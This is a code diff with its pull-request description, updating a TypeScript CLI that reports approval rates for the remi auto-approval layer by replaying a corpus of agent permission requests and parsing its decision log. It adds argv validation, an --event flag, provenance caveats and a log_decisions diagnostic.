  * `remi.log` -- how the LLM path itself is actually behaving. Not a
  * `bun:test` file; run directly with `bun run`.
  *
@@ -19,9 +25,14 @@
  *                     `build-hook-corpus.ts --mode structure-preserving`).
  *   --config <path>  `config.toml` to load `[auto_approve]` from. Default:
  *                     `~/.remi/config.toml` (same default `loadConfig` uses).
- *   --level <name>   Overrides the resolved config's `approve_groups` with
- *                     `groupsForLevel(<name>)` -- lets one config be swept
+ *   --level <name>   Overrides the resolved config's TOP-LEVEL `approve_groups`
+ *                     with `groupsForLevel(<name>)` -- lets one config be swept
  *                     across all three strictness presets without editing it.
+ *                     Does NOT touch `[auto_approve.agents.*]` sections: those
+ *                     REPLACE `approve_groups` for a matched `agent_type`
+ *                     (ADR 0025), so an agent-tagged record in the corpus is
+ *                     still decided by its own section's groups and ignores
+ *                     this sweep.
  *   --event <name>   Hook event to replay from the corpus. Default:
  *                     `PermissionRequest` (the population that asked remi --
  *                     what #996 measured). `PreToolUse` is a usable PROXY on
@@ -38,11 +49,18 @@
  *   --json           Print one JSON object instead of tables. The table and
  *                     JSON renderers consume the exact same computed
  *                     `Report`, so the two can never disagree with each
- *                     other about a number.
+ *                     other about a number. `provenance.caveat` carries the
+ *                     same PreToolUse-population caveat the table prints,
+ *                     whenever `--event` is non-default.
+ *
+ * Known flags: --input --event --config --level --log --unique --json. Any
+ * other `--`-prefixed token, or a value that itself starts with `--` (the
+ * `--input --json` typo, where `--json` would silently become `--input`'s
+ * value), is rejected before anything runs.
  *
  * Exits non-zero only on a real error (input file missing, config/log
- * unreadable, invalid `--level`) -- an empty-but-present corpus is not an
- * error and reports as all-zero.
+ * unreadable, invalid `--level`, unknown flag, flag missing its value) --
+ * an empty-but-present corpus is not an error and reports as all-zero.
  */
 
 import * as fs from 'node:fs';
@@ -68,12 +86,68 @@ import {
   classifyMiss,
   loadCorpusRecords,
   parseDecisionLog,
+  percentile,
   replayDeterministic,
 } from './approval-rate.ts';
 
 // ---------------------------------------------------------------------------
 // argv
 // ---------------------------------------------------------------------------
+
+/** Every flag this CLI understands. A `--`-prefixed token outside this set
+ *  is a typo, not a silent no-op -- rejected up front rather than parsed as
+ *  (say) `--input`'s value or ignored entirely. */
+const KNOWN_FLAGS: ReadonlySet<string> = new Set([
+  '--input',
+  '--event',
+  '--config',
+  '--level',
+  '--log',
+  '--unique',
+  '--json',
+]);
+
+/** Flags that consume the next argv token as a value. `--unique`/`--json`
+ *  are bare switches and are deliberately excluded. */
+const VALUE_FLAGS: ReadonlySet<string> = new Set([
+  '--input',
+  '--event',
+  '--config',
+  '--level',
+  '--log',
+]);
+
+/**
+ * Rejects an unknown `--`-prefixed token, and rejects a value-flag's value
+ * when that value itself starts with `--` -- the `--input --json` typo,
+ * where `argValue('--input')` would otherwise silently return the STRING
+ * `"--json"` and leave `--json` unset. Runs over the raw argv before any
+ * flag is read, so every flag below can trust its own value already passed
+ * this check.
+ */
+function validateArgv(argv: readonly string[]): void {
+  for (let i = 0; i < argv.length; i++) {
+    const token = argv[i];
+    if (token === undefined || !token.startsWith('--')) continue;
+    if (!KNOWN_FLAGS.has(token)) {
+      console.error(
+        `[approval-rate] Unknown flag "${token}". Valid flags: ${[...KNOWN_FLAGS].join(' ')}`,
+      );
+      process.exit(1);
+    }
+    if (VALUE_FLAGS.has(token)) {
+      const value = argv[i + 1];
+      if (value?.startsWith('--')) {
+        console.error(
+          `[approval-rate] "${token}" expects a value but got flag-like "${value}" -- missing the actual value?`,
+        );
+        process.exit(1);
+      }
+    }
+  }
+}
+
+validateArgv(process.argv.slice(2));
 
 function argValue(flag: string): string | undefined {
   const idx = process.argv.indexOf(flag);
@@ -122,7 +196,17 @@ interface ProvenanceInfo {
   readonly configFound: boolean;
   readonly resolvedLevel: AutoApproveLevel;
   readonly resolvedApproveGroups: readonly string[];
+  /** From the resolved config's `auto_approve.log_decisions` (default
+   *  `true`, config.ts:415). A `false` value means the (d) log section's
+   *  post-LLM matrix line, deterministic-approve line, and multichoice-skip
+   *  escalate line were never written, so `llmPathCount` reads 0 by
+   *  construction rather than by an empty log. */
+  readonly logDecisions: boolean;
   readonly logPath: string | undefined;
+  /** Set whenever `eventName !== 'PermissionRequest'`: the PreToolUse-proxy
+   *  population caveat, verbatim -- the same text the table renderer prints,
+   *  carried here so `--json` consumers see it too. */
+  readonly caveat: string | undefined;
 }
 
 interface ToolCoverage {
@@ -222,13 +306,20 @@ function buildCoverageReport(tally: ReplayTally): CoverageReport {
   };
 }
 
-const MISS_BUCKETS: readonly MissBucket[] = [
-  'heredoc',
-  'redirection',
-  'pipeline',
-  'chained',
-  'single',
-];
+/** Every `MissBucket` union member, once, as an object literal -- TS rejects
+ *  this literal if a member is missing OR a stray key is added, so a bucket
+ *  added to the union in `approval-rate.ts` without a render entry here is a
+ *  COMPILE error, not a silently missing table row. Keys are read back with
+ *  `Object.keys`, which preserves this literal's insertion order, so it also
+ *  fixes the render order in one place. */
+const MISS_BUCKET_ORDER: Readonly<Record<MissBucket, true>> = {
+  heredoc: true,
+  redirection: true,
+  pipeline: true,
+  chained: true,
+  single: true,
+};
+const MISS_BUCKETS = Object.keys(MISS_BUCKET_ORDER) as MissBucket[];
 
 function buildMissReport(
   replay: ReplayResult,
@@ -267,20 +358,17 @@ function buildBandReport(tally: ReplayTally): BandReport {
   return { total: tally.residual, byBand: tally.residualByBand };
 }
 
-/** Nearest-rank percentile (ceil, not floor): for a 2-sample array, `p50`
- *  lands on the lower value and `p95` on the upper one, matching what a
- *  reader expects a median of two samples to mean. A floor-based index
- *  instead picks the UPPER value for `p50` at every even small `n` --
- *  technically a valid discrete-percentile convention, but confusing in a
- *  report meant to be read directly. */
-function percentile(values: readonly number[], p: number): number | null {
-  if (values.length === 0) return null;
-  const sorted = [...values].sort((a, b) => a - b);
-  const idx = Math.min(sorted.length - 1, Math.max(0, Math.ceil((p / 100) * sorted.length) - 1));
-  return sorted[idx] ?? null;
-}
-
-const LOG_VERDICTS: readonly LogVerdict[] = ['approve', 'deny', 'escalate', 'cancelled', 'error'];
+/** Every `LogVerdict` union member, once -- same exhaustiveness trick as
+ *  `MISS_BUCKET_ORDER` above: a verdict added to the union without a render
+ *  entry here is a compile error, not a silently missing row. */
+const LOG_VERDICT_ORDER: Readonly<Record<LogVerdict, true>> = {
+  approve: true,
+  deny: true,
+  escalate: true,
+  cancelled: true,
+  error: true,
+};
+const LOG_VERDICTS = Object.keys(LOG_VERDICT_ORDER) as LogVerdict[];
 
 function buildLogReport(text: string): LogReport {
   const { tally } = parseDecisionLog(text);
@@ -332,10 +420,8 @@ function printReport(report: Report): void {
   console.log(`  date:              ${report.provenance.date}`);
   console.log(`  input:             ${report.provenance.inputPath}`);
   console.log(`  event:             ${report.provenance.eventName}`);
-  if (report.provenance.eventName !== 'PermissionRequest') {
-    console.log(
-      '                     CAVEAT: not the asked-remi population #996 measured -- includes calls approved without a PermissionRequest.',
-    );
+  if (report.provenance.caveat !== undefined) {
+    console.log(`                     CAVEAT: ${report.provenance.caveat}`);
   }
   console.log(
     `  records:           ${report.provenance.rawRecordCount} raw, ${report.provenance.effectiveRecordCount} replayed${report.provenance.unique ? ' (--unique)' : ''}`,
@@ -347,6 +433,7 @@ function printReport(report: Report): void {
   console.log(
     `  approve_groups:    ${report.provenance.resolvedApproveGroups.length > 0 ? report.provenance.resolvedApproveGroups.join(', ') : '(none)'}`,
   );
+  console.log(`  log_decisions:     ${report.provenance.logDecisions}`);
   if (report.provenance.logPath !== undefined) {
     console.log(`  log:               ${report.provenance.logPath}`);
   }
@@ -369,13 +456,19 @@ function printReport(report: Report): void {
   }
 
   console.log('\n(b) Miss classification (residual Bash commands, by shape)\n');
+  // Widest label decides the column, not a hardcoded guess -- 'unclassifiable'
+  // (14 chars) is longer than every MissBucket name, so a fixed width sized
+  // to the buckets alone broke alignment on that row.
+  const bucketLabelWidth = Math.max(...MISS_BUCKETS.map((b) => b.length), 'unclassifiable'.length);
   for (const bucket of MISS_BUCKETS) {
     const stats = report.misses.buckets[bucket];
     const bandStr = RISK_BANDS.map((band) => `${band}=${stats.byBand[band]}`).join(' ');
-    console.log(`  ${bucket.padEnd(11)} ${String(stats.count).padStart(5)}   ${bandStr}`);
+    console.log(
+      `  ${bucket.padEnd(bucketLabelWidth)} ${String(stats.count).padStart(5)}   ${bandStr}`,
+    );
   }
   console.log(
-    `  ${'unclassifiable'.padEnd(11)} ${String(report.misses.unclassifiable).padStart(5)}   (non-Bash, or no string command)`,
+    `  ${'unclassifiable'.padEnd(bucketLabelWidth)} ${String(report.misses.unclassifiable).padStart(5)}   (non-Bash, or no string command)`,
   );
 
   console.log('\n(c) Band distribution of the LLM-bound residue\n');
@@ -445,7 +538,22 @@ function main(): void {
   let log: LogReport | undefined;
   if (logPath !== undefined) {
     const text = fs.readFileSync(logPath, 'utf8');
-    log = buildLogReport(text);
+    const builtLog = buildLogReport(text);
+    log = builtLog;
+    // Diagnostic, independent of --json: a `false` log_decisions on the
+    // source machine makes the post-LLM matrix line (and the deterministic-
+    // approve / multichoice-skip lines) never get written at all, so
+    // llmPathCount reads 0 even though real verdicts were logged. Printed to
+    // stderr so it never lands inside piped/parsed --json stdout.
+    const totalVerdicts = LOG_VERDICTS.reduce(
+      (sum, verdict) => sum + builtLog.byVerdict[verdict],
+      0,
+    );
+    if (builtLog.llmPathCount === 0 && totalVerdicts > 0) {
+      console.error(
+        `[approval-rate] WARNING: llm-path is 0 while byVerdict totals ${totalVerdicts} > 0 -- likely log_decisions = false on the machine that wrote this log, gating out the post-LLM matrix line (see provenance.log_decisions).`,
+      );
+    }
   }
 
   const report: Report = {
@@ -460,7 +568,12 @@ function main(): void {
       configFound,
       resolvedLevel: config.level,
       resolvedApproveGroups: config.approve_groups,
+      logDecisions: config.log_decisions,
       logPath,
+      caveat:
+        eventName !== 'PermissionRequest'
+          ? 'not the asked-remi population #996 measured -- includes calls approved without a PermissionRequest.'
+          : undefined,
     },
     coverage: buildCoverageReport(replay.tally),
     misses: buildMissReport(replay, recordsByIndex),

--- a/packages/daemon/tests/auto-approve/run-approval-rate-report.ts
+++ b/packages/daemon/tests/auto-approve/run-approval-rate-report.ts
@@ -9,8 +9,8 @@
  *
  * Usage:
  *   bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts \
- *     [--input <path>] [--config <path>] [--level strict|balanced|trusted] \
- *     [--log <path>] [--unique] [--json]
+ *     [--input <path>] [--event <name>] [--config <path>] \
+ *     [--level strict|balanced|trusted] [--log <path>] [--unique] [--json]
  *
  * Flags:
  *   --input <path>   JSONL corpus to replay (`loadCorpusRecords`). Default:
@@ -22,6 +22,14 @@
  *   --level <name>   Overrides the resolved config's `approve_groups` with
  *                     `groupsForLevel(<name>)` -- lets one config be swept
  *                     across all three strictness presets without editing it.
+ *   --event <name>   Hook event to replay from the corpus. Default:
+ *                     `PermissionRequest` (the population that asked remi --
+ *                     what #996 measured). `PreToolUse` is a usable PROXY on
+ *                     a machine whose `REMI_HOOK_DEBUG=1` capture window
+ *                     holds no PermissionRequest, but it is a different
+ *                     population (it includes calls Claude Code's own
+ *                     allowlist approved without asking remi); the header
+ *                     carries a caveat line whenever this is non-default.
  *   --log <path>     A `remi.log` (or any text carrying `[AutoApprove ...]`
  *                     lines) to additionally run through `parseDecisionLog`.
  *                     Omitted: the log section is skipped entirely.
@@ -82,6 +90,7 @@ function expandHome(p: string): string {
 const DEFAULT_INPUT_PATH = path.join(import.meta.dir, 'fixtures', '.local-command-corpus.jsonl');
 
 const inputPath = expandHome(argValue('--input') ?? DEFAULT_INPUT_PATH);
+const eventName = argValue('--event') ?? 'PermissionRequest';
 const configPath = expandHome(argValue('--config') ?? CONFIG_PATH);
 const logPathArg = argValue('--log');
 const logPath = logPathArg !== undefined ? expandHome(logPathArg) : undefined;
@@ -105,6 +114,7 @@ const levelOverride: AutoApproveLevel | undefined = levelArg as AutoApproveLevel
 interface ProvenanceInfo {
   readonly date: string;
   readonly inputPath: string;
+  readonly eventName: string;
   readonly rawRecordCount: number;
   readonly effectiveRecordCount: number;
   readonly unique: boolean;
@@ -159,7 +169,7 @@ interface LatencyStats {
 
 interface LogReport {
   readonly totalLines: number;
-  readonly unparsed: number;
+  readonly autoApproveNonDecision: number;
   readonly fastPathCount: number;
   readonly llmPathCount: number;
   readonly byVerdict: Readonly<Record<LogVerdict, number>>;
@@ -291,7 +301,7 @@ function buildLogReport(text: string): LogReport {
   }
   return {
     totalLines: tally.totalLines,
-    unparsed: tally.unparsed,
+    autoApproveNonDecision: tally.autoApproveNonDecision,
     fastPathCount: tally.fastPathCount,
     llmPathCount: tally.llmPathCount,
     byVerdict: tally.byVerdict,
@@ -321,6 +331,12 @@ function printReport(report: Report): void {
   rule();
   console.log(`  date:              ${report.provenance.date}`);
   console.log(`  input:             ${report.provenance.inputPath}`);
+  console.log(`  event:             ${report.provenance.eventName}`);
+  if (report.provenance.eventName !== 'PermissionRequest') {
+    console.log(
+      '                     CAVEAT: not the asked-remi population #996 measured -- includes calls approved without a PermissionRequest.',
+    );
+  }
   console.log(
     `  records:           ${report.provenance.rawRecordCount} raw, ${report.provenance.effectiveRecordCount} replayed${report.provenance.unique ? ' (--unique)' : ''}`,
   );
@@ -374,7 +390,7 @@ function printReport(report: Report): void {
     const log = report.log;
     console.log('\n(d) Live decision log\n');
     console.log(
-      `  lines: ${log.totalLines}   unparsed: ${log.unparsed}   fast-path: ${log.fastPathCount}   llm-path: ${log.llmPathCount}   queue-timeout: ${log.queueTimeoutCount}   risk-ceiling: ${log.riskCeilingCount}`,
+      `  lines: ${log.totalLines}   aa-non-decision: ${log.autoApproveNonDecision}   fast-path: ${log.fastPathCount}   llm-path: ${log.llmPathCount}   queue-timeout: ${log.queueTimeoutCount}   risk-ceiling: ${log.riskCeilingCount}`,
     );
     console.log('\n  verdict rates:\n');
     for (const verdict of LOG_VERDICTS) {
@@ -420,7 +436,7 @@ function main(): void {
     process.exit(1);
   }
 
-  const rawRecords = loadCorpusRecords(inputPath);
+  const rawRecords = loadCorpusRecords(inputPath, eventName);
   const recordsByIndex = new Map(rawRecords.map((r) => [r.index, r] as const));
   const { config, configFound } = resolveAutoApproveConfig();
 
@@ -436,6 +452,7 @@ function main(): void {
     provenance: {
       date: new Date().toISOString(),
       inputPath,
+      eventName,
       rawRecordCount: rawRecords.length,
       effectiveRecordCount: replay.tally.total,
       unique: uniqueFlag,


### PR DESCRIPTION
## Summary

The measurement phase of epic #1057: a repeatable approval-rate report over the #992 corpus-replay harness, so every later phase proves its delta against the same baseline.

- `approval-rate.ts` — importable library: corpus loader (any hook event, default `PermissionRequest`; `--event PreToolUse` serves as a stated-caveat proxy where no PermissionRequest capture exists), engine-free deterministic replay through the real `evaluateDeterministic`, the #996 miss classifier (heredoc > redirection > pipeline > chained > single), and a `remi.log` decision-line parser kept in sync with `formatMatrixContext` by test.
- `run-approval-rate-report.ts` — standalone CLI in the `run-*-sweep.ts` genre: provenance header, coverage/miss/band/log sections, `--json`.
- `approval-rate.test.ts` — 24 CI-safe tests, no fixture dependency.
- `.context/approval-rate-baseline-2026-08.md` — the 2026-08-15 two-machine baseline, all numbers read off real runs. Headlines: local LLM layer approves 30.3% (87/287), high band 0-for-88 approvable (the #976 ceiling wall), mba shows 498 engine-timeout ERROR verdicts at p50 30s and 9.4s approve p50.

#992's original two deliverables (structure-preserving capture, guard-chain invariant replay) were already on develop; this closes the issue with the rate view it was missing.

Closes #992
Part of epic #1057

## Test plan

- `bun test packages/daemon/tests/auto-approve/` — 2014+ pass, 0 fail, new suite included and fixture-free
- CLI smoke: table + `--json | jq` against real corpus/config/logs on both machines (numbers in the baseline doc)
- `bunx biome check` + `bun run typecheck` clean